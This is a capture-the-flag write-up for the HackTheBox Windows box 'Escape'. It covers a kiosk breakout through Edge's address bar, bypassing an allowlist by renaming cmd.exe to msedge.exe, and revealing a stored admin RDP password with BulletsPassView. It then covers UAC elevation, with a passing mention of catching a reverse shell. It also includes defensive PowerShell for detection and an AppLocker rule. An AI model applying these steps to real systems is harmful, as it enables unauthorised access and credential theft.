Yogeshwar Peela

Originally published at exploitnotes.hashnode.dev

HackTheBox: vulnEscape Writeup

Summary

Escape is a Windows box that exposes only RDP (3389). The RDP session drops you into a locked-down kiosk account (KioskUser0) meant for a "Conference Display" app. The box is solved entirely through a kiosk breakout: abusing Edge's address bar to browse the local filesystem, bypassing an application allowlist by renaming binaries, then finding a third-party RDP client (Remote Desktop Plus) with saved-but-masked credentials for the admin account. Those credentials are recovered with a Nirsoft password-reveal tool, and admin turns out to be a local administrator, giving full SYSTEM-level access after a UAC prompt.


Reconnaissance

Only one port open - RDP:

nmap -A -Pn <machine-ip> -oA nmap

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Escape
| rdp-ntlm-info:
|   Target_Name: ESCAPE
|   NetBIOS_Domain_Name: ESCAPE
|   NetBIOS_Computer_Name: ESCAPE
|   DNS_Domain_Name: Escape
|   DNS_Computer_Name: Escape
|   Product_Version: 10.0.19041

Full port scan confirmed only 3389/tcp is reachable. Windows 11-based build, standalone workgroup box (ESCAPE).

Added it to hosts and connected:

echo '<machine-ip> escape.vl ESCAPE.VL' >> /etc/hosts
xfreerdp /v:<machine-ip> /cert:ignore /sec:tls

The login screen tells you exactly what to do:

Conference Display - Login as KioskUser0 without Password


Foothold - Breaking Out of the Kiosk

Logging in as KioskUser0 drops you straight into a wallpaper ("Busan Expo") with no visible taskbar or icons. Clicking around does nothing.

  • Pressing the Windows key brings up the Start menu / search bar.
  • Searching cmd and clicking it → does nothing (blocked).
  • Searching edge opens it successfully. So the restriction looks like an allowlist, not a blocklist — only specific apps (like Edge) are permitted to launch.
  • With Edge open, typing C:\ directly into the address bar renders a directory listing of the filesystem (Edge treats it as a local file:// browse). This is enough to walk the entire disk from the browser.

Browsing to the kiosk user's desktop:

C:\Users\KioskUser0\Desktop\user.txt

user.txt: [REDACTED]

Getting a real shell - allowlist bypass

Browsing to C:\Windows\System32\, I located cmd.exe and downloaded it via Edge into the Downloads folder. Running it directly failed:

제한 사항 (Restriction)
이 작업은 시스템 제한 때문에 취소되었습니다. 시스템 관리자에게 문의하십시오.
(This operation was cancelled due to system restrictions. Contact your administrator.)

Renaming the downloaded binary didn't help at first — but since Edge (msedge.exe) is the one thing the allowlist actually permits, renaming cmd.exe to msedge.exe and running it bypassed the restriction entirely and popped a working shell:

C:\Users\kioskUser0\Downloads>whoami
escape\kioskuser0

C:\Users\kioskUser0\Downloads>whoami /all
USER INFORMATION
----------------
User Name          SID
escape\kioskuser0  S-1-5-21-3698417267-3345840482-3422164602-1002

GROUP INFORMATION (relevant)
BUILTIN\Remote Desktop Users
BUILTIN\Users
Mandatory Label\Medium Mandatory Level

PRIVILEGES INFORMATION
SeShutdownPrivilege            Disabled
SeChangeNotifyPrivilege        Enabled
SeUndockPrivilege              Disabled
SeIncreaseWorkingSetPrivilege  Disabled
SeTimeZonePrivilege            Disabled

The same rename trick works for powershell.exe (download it, rename it to msedge.exe, run it) to get a real PowerShell session instead of cmd.
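From the defender's side, the rename trick leaves a simple artifact: the copied binary still carries its original name in its PE version resource, and its Microsoft signature still validates (so a signature check alone does not distinguish it from the real Edge). The following PowerShell is an added example, not part of the writeup: it walks user-writable folders (the Downloads path and account name are taken from this box; the other roots are assumptions) and reports executables whose on-disk name does not match the OriginalFilename compiled into them.

```powershell
# Added example (not from the writeup): flag executables whose on-disk name differs from
# the OriginalFilename in their PE version resource. A cmd.exe renamed to msedge.exe keeps
# OriginalFilename "Cmd.Exe" and a valid Microsoft signature, so the name mismatch is the
# indicator, not the signature status.
# Scan roots: the kiosk user's Downloads folder is from the writeup; the rest are assumed.
$scanRoots = @('C:\Users\KioskUser0\Downloads', 'C:\Users\Public', 'C:\temp')

function Find-RenamedBinaries {
    param([string[]]$Roots)
    foreach ($root in $Roots) {
        if (-not (Test-Path -Path $root)) { continue }
        Get-ChildItem -Path $root -Recurse -File -Include *.exe -ErrorAction SilentlyContinue |
        ForEach-Object {
            $vi   = $_.VersionInfo
            $orig = $vi.OriginalFilename
            # No version resource means there is nothing to compare against; skip the file.
            if ([string]::IsNullOrWhiteSpace($orig)) { return }
            # OriginalFilename casing and extension vary ("Cmd.Exe", "PowerShell.EXE"),
            # so compare base names; PowerShell's -ne is case-insensitive by default.
            $origBase = [IO.Path]::GetFileNameWithoutExtension($orig)
            if ($origBase -ne $_.BaseName) {
                $sig = Get-AuthenticodeSignature -FilePath $_.FullName
                [pscustomobject]@{
                    Path             = $_.FullName
                    OriginalFilename = $orig
                    ProductName      = $vi.ProductName
                    SignatureStatus  = $sig.Status
                    Signer           = $sig.SignerCertificate.Subject
                }
            }
        }
    }
}

Find-RenamedBinaries -Roots $scanRoots | Format-Table -AutoSize
```

A hit such as C:\Users\KioskUser0\Downloads\msedge.exe with OriginalFilename Cmd.Exe and ProductName containing "Windows Operating System" is exactly the artifact this breakout leaves behind.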


Enumeration as kioskuser0

PS C:\Users> dir
admin
Administrator
DefaultAppPool
kioskUser0
Public

PS C:\Users> cd .\admin\
dir : Access to the path 'C:\Users\admin' is denied.

PS C:\Users> net user
admin   Administrator   DefaultAccount
Guest   kioskUser0      WDAGUtilityAccount

Can't read admin's profile directly, but a hidden admin-owned folder is visible at the root of C:\:

PS C:\> Get-ChildItem -Force
d--h--   _admin
...
d-----   temp
PS C:\_admin> ls
installers/
passwords/
temp/
Default.rdp
profiles.xml

profiles.xml is a config file for a third-party RDP client:

PS C:\_admin> type .\profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
    <Secure>False</Secure>
  </Profile>
</Data>

An encrypted/encoded password for the admin profile — but we can't decrypt it manually, so the plan is to load it into the actual Remote Desktop Plus app and let the GUI decrypt it for us.


Recovering the Password

Remote Desktop Plus is installed under Program Files (x86):

PS C:\Program Files (x86)> ls
Remote Desktop Plus/

PS C:\Program Files (x86)\Remote Desktop Plus> ls
rdp.exe

Since C:\_admin isn't writable/reachable from the app's file picker, first copy profiles.xml somewhere the low-priv user can access:

copy C:\_admin\profiles.xml C:\Users\kioskUser0\Downloads\

Ran rdp.exe → Manage Profiles → Import → selected the copied profiles.xml. The admin profile now loads in the app, with the password field shown as bullets (••••••••). Double-clicking / editing / copying the field is all blocked — no cleartext, no clipboard.

To reveal it, used a Nirsoft tool that reads masked password fields from Windows dialogs: BulletsPassView.


# attacker box
unzip bulletspassview.zip
python3 -m http.server 80

Downloaded BulletsPassView.exe onto the target from http://<your-ip>/BulletsPassView.exe (via the browser filesystem trick again), ran it against the open Remote Desktop Plus dialog, and it revealed the masked field:

Password: Twisting30217

Privilege Escalation — kioskuser0 → admin

Confirmed admin is a local administrator:

PS C:\temp> net user admin
Local Group Memberships   *Administrators
Password required          No

First attempt with runas didn't actually elevate (still showed kioskuser0 after — likely a profile/token quirk with runas in this restricted context):

runas /user:admin powershell

Instead, spawning PowerShell with an elevation request worked and triggered a normal UAC consent prompt:

Start-Process powershell.exe -Verb runas

The prompt asked to allow Windows PowerShell (Microsoft-signed) to make changes — clicked Yes, and landed in an elevated shell:

PS C:\Windows\system32> whoami
escape\admin

Root Flag

PS C:\Users\Administrator\Desktop> ls
Microsoft Edge.lnk
root.txt

PS C:\Users\Administrator\Desktop> type .\root.txt
[REDACTED]

At this point you're escape\admin, a full local administrator with no shell restrictions — from here you can also drop nc64.exe, catch a reverse shell, and operate as SYSTEM without any of the kiosk-mode limitations.


Key Vulnerabilities & Attack Chain

  1. Kiosk breakout via browser LOLBin — Edge's address bar accepts local paths (C:\) and renders a full directory listing, giving filesystem access from a "locked down" kiosk session.
  2. Weak application allowlist — restriction is enforced by filename/allowlist rather than a real AppLocker/SRP hash policy, so simply renaming cmd.exe/powershell.exe to msedge.exe bypasses it entirely.
  3. Cleartext-recoverable stored credentials: Remote Desktop Plus stores admin RDP credentials in a profiles.xml that becomes world-readable once copied; the app's own password masking is trivially defeated with a generic password-reveal tool (BulletsPassView), since it's just a masked UI field, not real encryption-at-rest protection.
  4. Weak/no password policy — admin account had "password required: No" enabled at some point and a simple password (Twisting30217).
  5. Standard UAC consent — once valid admin credentials/session are available, Start-Process -Verb runas + accepting the UAC prompt is enough to get a fully elevated administrator shell.
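Item 2 is the root cause of the shell access: a filename-based allowlist. The fix is a rule that keys on something the attacker cannot change by renaming. The PowerShell below is an added example, not part of the writeup or the box's configuration: it builds an AppLocker publisher rule for Edge scoped to the kiosk account (a publisher rule rather than the hash rule the item mentions, because it survives Edge updates), switches the collection to enforce, and dry-runs the policy against both the real msedge.exe and a renamed cmd.exe with Test-AppLockerPolicy. Assumptions: Edge sits at its default per-machine path, the kiosk account is KioskUser0 as on this box, and the Application Identity service (AppIDSvc) is running so the policy is actually enforced.

```powershell
# Added example (not from the writeup): replace a filename allowlist with an AppLocker
# publisher rule. Publisher rules match the signer, product and the binary name stored in
# the PE version resource, so a cmd.exe renamed to msedge.exe (OriginalFilename "Cmd.Exe",
# product "Microsoft Windows Operating System") does not satisfy the rule for Edge.
# Assumed paths; the kiosk account name is the one from this box.
$edge      = 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
$policyXml = 'C:\ProgramData\kiosk-applocker.xml'

# Build an Exe rule collection containing one publisher rule scoped to the kiosk user.
$xml = Get-AppLockerFileInformation -Path $edge |
       New-AppLockerPolicy -RuleType Publisher -User 'KioskUser0' -RuleNamePrefix 'Kiosk' -Xml

# New-AppLockerPolicy emits EnforcementMode="NotConfigured"; set the collection to enforce,
# so anything without a matching allow rule is denied for that user (merge the other rules
# the kiosk session legitimately needs before relying on this).
$xml -replace 'EnforcementMode="NotConfigured"', 'EnforcementMode="Enabled"' |
    Set-Content -Path $policyXml -Encoding UTF8

# Dry-run the policy against the genuine Edge binary and a renamed cmd.exe before applying it.
# Expected decisions: the real msedge.exe -> Allowed (MatchingRule "Kiosk..."),
# the renamed copy in Downloads -> Denied, despite carrying the same file name.
$renamed = 'C:\Users\KioskUser0\Downloads\msedge.exe'   # a copy of cmd.exe, as in the writeup
Test-AppLockerPolicy -XmlPolicy $policyXml -Path $edge, $renamed -User 'KioskUser0' |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# Apply by merging into the local policy (elevated shell). Use EnforcementMode="AuditOnly"
# first and review the AppLocker "EXE and DLL" event log if helper executables are unknown.
# Set-AppLockerPolicy -XmlPolicy $policyXml -Merge
```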

Attack Chain

RDP → KioskUser0 (no password)
│
├── Kiosk breakout
│   ├── Win key → Start search
│   │   ├── "cmd"  → blocked (allowlist)
│   │   └── "edge" → allowed
│   └── Edge address bar → C:\  (file:// directory listing)
│       └── user.txt  [FLAG 1]
│
├── Shell access
│   ├── Download cmd.exe / powershell.exe from System32
│   ├── Rename → msedge.exe
│   └── Run → allowlist bypassed → shell as escape\kioskuser0
│
├── Credential discovery
│   ├── C:\_admin\profiles.xml  (Remote Desktop Plus config)
│   ├── copy → C:\Users\kioskUser0\Downloads\
│   ├── Import into rdp.exe (Remote Desktop Plus GUI)
│   │   └── password shown as ●●●●●●●● (masked)
│   └── BulletsPassView.exe (hosted on attacker box, downloaded to target)
│       └── reveals password → Twisting30217
│
└── Privilege escalation
    ├── net user admin → member of Administrators
    ├── runas /user:admin powershell → didn't elevate
    └── Start-Process powershell -Verb runas
        └── UAC prompt → Yes → escape\admin
            └── root.txt  [FLAG 2]
